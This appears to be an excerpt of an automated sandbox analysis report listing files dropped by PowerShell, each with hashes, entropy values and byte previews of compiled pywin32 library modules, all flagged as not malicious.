                                                                                                                                                                                                            Preview:o..........g.........................@...s8...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d...Z.e.d.e.......d.S.)......Nc....................C...s....d.t.j.j.v.r.d.n.d.}.d.|.t.j.j.t.j.j.|.f...}.t.t.d...rHt.j.D.].}.t.j...|...r,t.j...|...}.t.j...|.|...}.t.j...|...r;..n.q.t.d.|...d.t.j.........nvd.d.l.}.|...|...}.|.d.u.rZ|...|...}.|.d.u.rrt.j...t.j...t.j.|.....rrt.j...t.j.|...}.|.d.u.r.t.j...t.j...t.j...t...|.....r.t.j...t.j...t...|...}.|.d.u.r.d.d.l.}.|.j.D.].}.t.j...|.|...}.t.j...|...r.|.}...n.q.|.d.u.r.t.d.|...d.|...d.......t.j.|...}.t.j...|.|...}.t.j.j.|.|.|.d...}.t.j...|...}.|.j...|.....t.j.|...|.u.s.J...|.t.j.|.<.|...|.j.....d.S.).Nz._d.pyd.._d..z.%s%d%d%s.dll..frozenz.Module 'z.' isn't in frozen sys.path r....z.No system module 'z.' (..))...name..loader..origin)...importlib..machinery..EXTENSION_SUFFIXES..sys..version_info..major..minor..hasattr..path..os..isfile..dirname..join..ImportError.._win32sysloaderZ.GetModuleFilenameZ.LoadModule..prefix..__file__..pywin32_system32..__path__..modules
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1913
                                                                                                                                                                                                            Entropy (8bit):5.582594429278979
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:CDVrnK+xnx+EOTQo7vklV4cZfb7wi/AkbptHx2MjYC98af0fc5Jcvi13hc5fNtei:C9KEkEOTJoBUi5tR2AfJcaZhcZucj/
                                                                                                                                                                                                            MD5:95692E087A3EFA486335AB29BB98050D
                                                                                                                                                                                                            SHA1:9D6370F7B2E8C8BD5BA568B210D532453767CC5D
                                                                                                                                                                                                            SHA-256:58C598E197F5C626F8AE47FE094D8491F5112C309891E9DE53648753F4F9CC13
                                                                                                                                                                                                            SHA-512:394F77D3EE02DF86B1A521D0B3B98D307CE0B6D0964F0CF13FDD2F128F1E8892D73CC2D9AAB304338A3CBFB5D227F4D12D3012E5AF34059D06C2A9A669B7EF67
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.i.e.j.d...e.j.d...e.j.d...e.j.d...e.j.d...e.j.d...e.j.d...e.j.d...e.j.d...e.j.d...e.j.d...e.j.d...e.j.d...e.j.d...e.j.d...e.j.d...e.j.d...e.j.d.e.j.d.e.j.d.e.j.d.e.j.d.e.j.d.e.j.d.e.j.d.e.j.d.e.j.d.e.j.d.i...Z.d.d...Z.d#d!d"..Z.d.S.)$.....NZ.OpenPortZ.PortOpenedZ.ConnectDeviceZ.DeviceConnectedZ.AllDevicesConnectedZ.AuthenticateZ.AuthNotifyZ.AuthRetryZ.AuthCallbackZ.AuthChangePasswordZ.AuthProjectZ.AuthLinkSpeedZ.AuthAckZ.ReAuthenticateZ.AuthenticatedZ.PrepareForCallbackZ.WaitForModemResetZ.WaitForCallbackZ.ProjectedZ.StartAuthenticationZ.CallbackCompleteZ.LogonNetwork..InteractiveZ.RetryAuthenticationZ.CallbackSetByCallerZ.PasswordExpiredZ.ConnectedZ.Disconnectedc....................C...s....t.d.|.|.t.|...|.|.....d.S.).Nz.Callback called with )...print..stateStrings).Z.hras..msg..state..errorZ.exterror..r.....hC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/lib/rasutil.py..TestCallback#...s.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3383
                                                                                                                                                                                                            Entropy (8bit):5.4556742814840415
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:C8OIeDyhWqP0wobtRhwU9u/y+WQHWC9ATXteoH:Czghr0FbtQEgU0WC9W9eoH
                                                                                                                                                                                                            MD5:0F6C6B37719FAB331ABB12377098AC63
                                                                                                                                                                                                            SHA1:B749DD5CE19BD32E47DC7AEACB06242E66F0F04C
                                                                                                                                                                                                            SHA-256:C74CC18D5F035FD26794D52901D6764398320EA6DF5DE7361AF91B4376A1C702
                                                                                                                                                                                                            SHA-512:08DCFDEFCC2E56D091A390A84CDF7C820FF53057F41BB373A4DC02B58AB9E24F2CDB2FBF53736334B39B82A209DB5E65B39D63EA493D75ED664FC97FDC45D9E2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.e.j.d.e.d.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.e.d.k.rUe.e.j...d.k.rMe.j.d...d.k.rMd.Z.n.d.Z.e.e.....d.S.d.S.)......Nz@The regcheck module has been pending deprecation since build 210)...categoryc....................C...sP...z.t...t...t.....t.....d...|.........W.d.S...t.t.j.f.y'......t.d.|.......Y.d.S.w.).N..\z-Registration of %s - Not registered correctly)...os..stat..win32api..RegQueryValue..regutil..GetRootKeyZ.GetAppPathsKey..OSError..error..print)...exename..r.....iC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/lib/regcheck.py..CheckRegisteredExe....s......................r....c....................C...s,...|...d...D.].}.t.j...|...s.d.|.......S.q.d.S.).N..;z.'%s' is not a valid directory!)...splitr......path..isdir).Z.pathStringr....r....r....r......CheckPathString....s..............r....c....................C...sX...|.r.t.d.....|
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9756
                                                                                                                                                                                                            Entropy (8bit):5.41563265883547
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:CB5uaULUEiQndCWxGRDqbNDkqYO+yJXKMnYOIUiV2C1is4kNqdXiB2a8zWju+sPd:wstLpptYIteJkkQdXs2csl
                                                                                                                                                                                                            MD5:5688D50A0BFDE818745FE76265E1B7DA
                                                                                                                                                                                                            SHA1:79F4962FD8A06BF2AF05C817D4EAA30E3400ACA6
                                                                                                                                                                                                            SHA-256:D31CBAF95CD473A0066EC6E675A0AB0314C595E84E37D3D0D41A2F1AF396DA1A
                                                                                                                                                                                                            SHA-512:947058CFCBF18F031023B5D3EF24138D4E80BF956D5F961963682A7A0E70CB0902C52653277225EF6053B14A83F1829E65DCF2EB904F0795903A55ED5F875BCC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.1.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d/d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.d0d"d#..Z.d.d$d%..Z.d.d&d'..Z.d(d)..Z.d.d*d+..Z.d,d-..Z.d.S.)1.....Nz&{b51df050-06ae-11cf-ad3b-524153480001}z.Python.Filez.Python.CompiledFilec....................C...s....d.t.j...S.).z.Builds a string containing the path to the current registry key... The Python registry key contains the Python version. This function. uses the version of the DLL used by the current process to get the. registry key currently in use.. z.Software\Python\PythonCore\)...sys..winver..r....r.....hC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/lib/regutil.py..BuildDefaultPythonKey....s......r....c....................C...s@...t...}.z.t...t.j.|...}.|.......t.j.W.S...t.j.y.......t.j...Y.S.w.).z-Retrieves the Registry root in use by Python.).r......win32
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9721
                                                                                                                                                                                                            Entropy (8bit):5.561706396112473
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:CWKKcY1GiEYsE2aprSW5Y/x0TNaUfCwPJ0rZdul6QWl0Oiad9:FKKcsGOsE2aRY/x2dfrPJ0rZHQC3d9
                                                                                                                                                                                                            MD5:7962A071C6C7499ADA9445AA71A76C2B
                                                                                                                                                                                                            SHA1:1BEF56E8B928ADCC9C02AFFC02A8B11CFF828912
                                                                                                                                                                                                            SHA-256:A5BAE887FDA170DB9ADBA0B2CB7B7C9C753169D107158A7CDC0622426B490DCA
                                                                                                                                                                                                            SHA-512:4FAB4E0285D2BC1C618C1F51467090F380DD2C79B4A4F0DDEEAB837796D133E125409B1BC5BE13B89423DE6C4A93EFA44B63F9F895CE150FB61AFC78590D2629
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g{>.......................@...s<...d.Z.d.d.l.Z.d.d.l.Z.e.j.Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.d.k...r.d.Z.e.j.e.j.B.e.j.B.e.j.B.e.j.B.Z.e...d.e.e.j.d.d...\.Z.Z.e...e.j...Z.e.d.e.....e.e.e.e.d...Z.e.e.e.d...Z.e.d...e.j.d...e.j.d.........d.Z.d.Z.d.Z.e.j.r~e.r.e.e.d...j ..r.e.d.7.Z.e..!e...\.Z"Z.e.d.e.......e.j.r.e.e.d...j ..d.k.r.n.e.d.7.Z.e..!e...\.Z"Z.e.d.e.......e.j.r~e.r.e.e.d...j ..s~e.d.e.j#....e.d.e.j$....d.Z%e..&e%..Z'e..(e%e'....e..)e%..\.Z*Z'e..+e*e'..Z,e,e%k.s.J...e..-e%..Z.e../e...\.Z0Z1e.d.e1....e%e0k.s.J...e.j-e%d.d...Z.e../e...\.Z0Z1e.d.e1....e%e0k...s.J...e.d.....d.S.d.S.).a6....Helper classes for SSPI authentication via the win32security module...SSPI authentication involves a token-exchange "dance", the exact details.of which depends on the authentication provider used. There are also.a number of complex flags and constants that need to be used - in most.cases, there are reasonable defaults...These classes attempt to hide these details from yo
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16989
                                                                                                                                                                                                            Entropy (8bit):5.582496468906059
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:Qny17hdmmFb1zdKS8QjD/5fNIoxAjoQ92w:jV8mn0Af/5fNkUQ9t
                                                                                                                                                                                                            MD5:C1618B1CB5156624C2CE19FF903E3370
                                                                                                                                                                                                            SHA1:C92C7026D4CF17F04F7FB9928242FB8D87ECB73E
                                                                                                                                                                                                            SHA-256:657F8F48C2B8584A200CAAD562E8A65F10F9069DF1CA2ED6021B2ABF070EB8D2
                                                                                                                                                                                                            SHA-512:73A2A1995BD16178107D6F731D5F10DEB8EFB42D42BC1764ED4740232894B7688657FD9E687E05098901D952E0C2160A45023FC1AE131C306A5CCB0C09467397
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.?.......................@...s....d.Z.d.Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d.Z#d.Z$d.Z%d Z&d!Z'd"Z(d#Z)d$Z*d.Z+d.Z,d.Z-d.Z.d.Z/d.Z0d!Z1d.Z2d.Z3d.Z4d.Z5d.Z6d.Z7d.Z8d.Z9d.Z:d.Z;d.Z<d.Z=d.Z>d.Z?d.Z@d.ZAd.ZBd.ZCd.ZDd%ZEd&ZFd'ZGd#ZHd.ZId.ZJd.ZKd.ZLd.ZMd.ZNd.ZOd.ZPd.ZQd.ZRd.ZSd.ZTd.ZUd.ZVd.ZWd.ZXd.ZYd.ZZd.Z[d%Z\d&Z]d'Z^d.Z_d.Z`d.Zad.Zbd.Zcd.Zdd.Zed.Zfd.Zgd.Zhd.Zid.Zjd.Zkd.Zld.Zmd%Znd&Zod'Zpd(Zqd)Zrd.Zsd*Ztd.Zud.Zvd.Zwd.Zxd.Zyd.Zzd.Z{d.Z|d.Z}d.Z~d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d%Z.d&Z.d'Z.d(Z.d)Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z.d+Z.d.Z.d,Z.d-Z.d.Z.d/Z.d0Z.d1Z.d2Z.d3Z.d4Z.d5Z.d6Z.d7Z.d8Z.d9Z.d:Z.d;Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d<Z.d=Z.d>Z.d?Z.e.Z.e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d@Z.dAZ.dBZ.dCZ.dDZ.dEZ.dFZ.dGZ.dHZ.dIZ.dJZ.dKZ.dLZ.dMZ.dNZ.dOZ.dPZ.dQZ.dRZ.dSZ.dTZ.dUZ.dVZ.dWZ.dXZ.dYZ.dZZ.d[Z.d\Z.d]Z.d^Z.d_Z.d`Z.daZ.dbZ.dcZ.ddZ.de
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):223
                                                                                                                                                                                                            Entropy (8bit):4.962183129779865
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/mC5CepzsWlkb83Dt95/n23d6xUAr48MdAZIm:C15D6Jb8zx/2Iak2m
                                                                                                                                                                                                            MD5:F297B6CBC5C1EB903DCD028AAE58A863
                                                                                                                                                                                                            SHA1:AAE7D68DBDCF30A3CEEF4F64978FC72824D3D206
                                                                                                                                                                                                            SHA-256:C36C01D84BEB1E45FEE33217CF8E332F73A5FC6B6B53459F0931E9CE5512371A
                                                                                                                                                                                                            SHA-512:CD9DF1302708C331394C3B30AE10526CD50B4CD5673FFA8A9B00294C2CD107844BD3A2D1CD6BBE59AD862629BA4A108CF5056D8BF064665DD68C9B8790CBDFD8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gU........................@...s....d.d.l.T.d.S.)......)...*N).Z.win32ras..r....r.....iC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/lib/win2kras.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):129333
                                                                                                                                                                                                            Entropy (8bit):5.667856266139039
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:XokPuUVwpDxHGc2VxWuAcGbBgUPO1o9Fb//IRM4c4CV:/w3TcqB01o92RM4c4CV
                                                                                                                                                                                                            MD5:5DD4B98AA50B951D33E8C25253B3D50D
                                                                                                                                                                                                            SHA1:05B46479A7E0EA717EB25622CEEF75E9D2FE1683
                                                                                                                                                                                                            SHA-256:7BAAD04A9A478FCFC48330D6C60881B0F47E37507CA8E1F0C799978539E90A2F
                                                                                                                                                                                                            SHA-512:F8ED9AFB0CD8F8A45FF6997ABF4DDF482945B6308BEE9262E73FBA185FC16E3FB1E4FCBA45885D800ECE788DA44224962A26C84FBCB5AEEBF0BD39818EEDECFF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s.z..d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z e.d...Z!e.d...Z"e!d...Z#e!d...Z$e!d...Z%e!d...Z&e!d...Z'e!d...Z(e!d ..Z)e!d!..Z*e.d"..Z+e.d#..Z,e+d...Z-e+d...Z.e+d...Z/e+d...Z0e+d...Z1e+d...Z2e+d ..Z3d.Z4d.Z5d.Z6d.Z7d.Z8d.Z9d.Z:d.Z;d.Z<d.Z=d.Z>d.Z?d.Z@d.ZAd.ZBd.ZCd.ZDd.ZEd.ZFd.ZGd.ZHd.ZId.ZJd.ZKd.ZLd.ZMd.ZNd.ZOeNeOB.ZPd.ZQd.ZRd.ZSd.ZTd.ZUd.ZVd.ZWd.ZXd.ZYeYZZd.Z[e[Z\d.Z]d.Z^d.Z_d.Z`d.Zad.Zbd.Zcd.Zdd.Zed.Zfd.Zgd.Zhd$Zid.Zjd.Zkd.Zld.Zmd.Znd.Zod.Zpd.Zqd.Zre.d...Zse.d%..Zte.d&..Zud'Zvd(Zwd)Zxd*Zyd+Zzd,Z{d-Z|evZ}ewZ~exZ.eyZ.ezZ.e{Z.e|Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d ..Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d/Z.d0Z.d1Z.d2Z.d3Z.d4Z.d5Z.d6Z.d7Z.d8Z.d.Z.d.Z.d.Z.d.Z.d9Z.d:Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z.d!
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):72843
                                                                                                                                                                                                            Entropy (8bit):5.7634756772723605
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:XmLmch209lusbv36BEvdzFYC0InDXYNLMlu1zO5vnS6g6y:Xm1209lx3FnQOx3y
                                                                                                                                                                                                            MD5:81E1EBD33460C4D5922EC7A9CCB30199
                                                                                                                                                                                                            SHA1:B87D2964C6EF5EB8779F36A4E03645BBEF394091
                                                                                                                                                                                                            SHA-256:90936A1442B29237348EBA0B1827FA6C202DC6758E99B5AEEB62FDE939086044
                                                                                                                                                                                                            SHA-512:26C1AB081271F9B8127DEF54FAC055520CD1F9E7170D9F762B1FD22A17CE33CB191AC1FAE018825A6EBA00E842704FDF152014B84E47B98AE6A1E338582D5562
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.".......................@...s`/..d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d.Z#d.Z$d.Z%d Z&d!Z'd"Z(d#Z)d.Z*d.Z+d.Z,d.Z-d"Z.d.Z/d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5d.Z6d.Z7d.Z8d.Z9d.Z:d.Z;d.Z<d.Z=d.Z>d.Z?d"Z@d#ZAd.ZBd.ZCd.ZDd.ZEd.ZFd.ZGd.ZHd.ZId.ZJd.ZKd$ZLe.e.B.e6B.ZMe.e.B.e7B.ZNe.e.B.e8B.ZOe.e.B.e9B.ZPe.e.B.e:B.ZQe.e.B.e;B.ZRe.e.B.e.B.ZSe.e.B.e.B.ZTe.e.B.e.B.ZUe.e.B.e.B.ZVe.e.B.e.B.ZWe.e.B.e!B.ZXe.e.B.e.B.ZYe.e.B.e.B.ZZe.e.B.e/B.Z[e.e.B.e0B.Z\e.e.B.e1B.Z]e.e.B.e2B.Z^e.e.B.e3B.Z_e.e.B.e4B.Z`e.e.B.e5B.Zae.e.B.e8B.Zbe.e.B.e(B.Zce.e.B.e)B.Zde.e.B.e"B.Zee.e.B.e>B.Zfe.e.B.eEB.Zge.e.B.eFB.Zhe.e.B.eGB.Zie.e.B.eKB.Zje.e.B.eHB.Zke.e.B.eIB.Zle.e.B.eJB.Zme.e.B.e#B.Zne.e.B.e?B.Zoe.e.B.e@B.Zpe.e.B.eAB.Zqe.e.B.e$B.Zre.e.B.e%B.Zse.e.B.e&B.Zte.e.B.e'B.Zue.e.B.eBB.Zve.e.B.eCB.Zwe.e.B.eDB.Zxd%Zyd.Zzd Z{d&Z|d'Z}d.Z~d.Z.d.Z.d.Z.d Z.d'Z.d Z.d'Z.d(Z.d)Z.d.Z.d.Z.d.Z.d*Z.d.Z.d.Z.d+Z.d.Z.d,Z.d.Z.d.Z.d.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4696
                                                                                                                                                                                                            Entropy (8bit):5.698363725754237
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:CHZCRFjaU3bOaPZSlhaeDFzckHKeQnaNNjc8ktJgzmcV2+O:CH8aURPglhjVckHKpaNm88Otm
                                                                                                                                                                                                            MD5:EB3FAE16CC02B7CDF452F1627AAA0D38
                                                                                                                                                                                                            SHA1:409A044D2FE2EB75796A8FD922C822655E713D86
                                                                                                                                                                                                            SHA-256:F6D60C6B40CDDFBA61D85C0DB7200810589C907507137425CBAAA979D674D5CF
                                                                                                                                                                                                            SHA-512:0BDECD31098C71CB79524A6A493542B6BBCB3CE27B48F359880ED5CFB818198FD3491F8E80BEED74E4535DA2034A41B02958EDB53E0B4CA68880ABD1C1B85267
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.Z.e...e.j.e.j...Z...........d.d.d...Z.d.d.d...Z.d.e.j.d.d.d.f.d.d...Z.d.d.d...Z.d.d.d...Z...d.d.d...Z.d.S.).z1Event Log Utilities - helper for win32evtlog.pyd......N..Applicationc....................C...s....|.d.u.r.t.j.}.t...t.j.d.|...d.|.......}.t...|.d.d.t.j.|.....|.d.u.r+t.j.t.j.B.t.j.B.}.t...|.d.d.t.j.|.....|.d.k.rT|.d.u.r@t.j.}.t...|.d.d.t.j.|.....t...|.d.d.t.j.|.....t...|.....d.S.).a&...Add a source of messages to the event log... Allows Python program to register a custom source of messages in the. registry. You must also provide the DLL name that has the message table, so the. full message text appears in the event log... Note that the win32evtlog.pyd file has a number of string entries with just "%1". built in, so many Python programs can simply use this DLL. Disadvantages are that. you do not get language translation, and the full text is stored in the event log,. blo
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15783
                                                                                                                                                                                                            Entropy (8bit):5.410126659951658
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:kLnH/Flur0CoCu0vxcWqnnL9l2Y4jPapqyI7TpWbOg1klyqubG:kLjk0Z905anL9AY4jPUqy2Ab4lyqui
                                                                                                                                                                                                            MD5:7A0BD64EDD6C318399D62D78B27C6B01
                                                                                                                                                                                                            SHA1:B58CFD747417D17287502682F356E99B0C73EE92
                                                                                                                                                                                                            SHA-256:B2AF5BF12E3AE055EA52797FC2F682B034FB02853C1FBDF502CCC7192737ABA3
                                                                                                                                                                                                            SHA-512:7CC059FA1981FD081940E4BF16FF1721F1B8F733A540AC69646FAFB2088C165293E93BDC8CD340F6C13429CB5B394A83111801B3F9742369F1679FF84C5A99DF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.t.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d...Z.d.e.j.v.Z.d.Z.e.r2d.Z.n.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.Z.....................dVd.d...Z.d.d...Z.dWd.d...Z.d.Z.............dXd.d...Z.d.d...Z.dYd.d...Z.d Z.d!d"..Z.d#d$..Z.d%d&..Z.dWd'd(..Z.d)d*..Z.d+d,..Z d-d...Z!d/Z"................dZd0d1..Z#d2d3..Z$d4d5..Z%d6d7..Z&dWd8d9..Z'd:Z(d[d;d<..Z)d=d>..Z*dWd?d@..Z+dAdB..Z,dCdD..Z-..d\dEdF..Z.d]dHdI..Z/...J...Kd^dLdM..Z0dNdO..Z1d_dPdQ..Z2G.dRdS..dS..Z3dTdU..Z4d.S.)`.....N)...namedtuplec....................C...s&...|.....}.t.|.d...|.d.d.......}.|.|...S.).Nr.........)...splitr....).Z.names_str..values..names..nt..r.....pC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/lib/win32gui_struct.py.._MakeResult)...s..........r....z.64 bit..PPi..xxxx..c....................C...s,...t.|.t...s.t.d.....|.d.....d...}.t...d.|...S.).Nz!MENUITEMINFO text must be unicode.....utf-16le..b)...isinstan
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):39849
                                                                                                                                                                                                            Entropy (8bit):5.356657751998644
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:sOFQcV4fxCGKNccSyjXxwNBx8gcVaohG/aAaFkzREE6dr0nsUZj4t/6LsS:sOJcxbKqcuNBx8g3/aAaFkzREE6dmTLn
                                                                                                                                                                                                            MD5:D2E8ED3F9B68AFC3472FDA1A342D584F
                                                                                                                                                                                                            SHA1:884D6D5BC920AD4AFDC7DAB18318552D79875CD0
                                                                                                                                                                                                            SHA-256:291F55B6967816A17597269460544C381235D16507B26DC6016DA8FBF3F05DA6
                                                                                                                                                                                                            SHA-512:53F5ED6C09C8568BFD32DD7FF5455E2CF1F36C6C1941C2A2489E5BBB2A23B42C95E2BDBE188BA493423B09D26E38B78AF3C0C332EA76DD841439C24F95EA16B4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
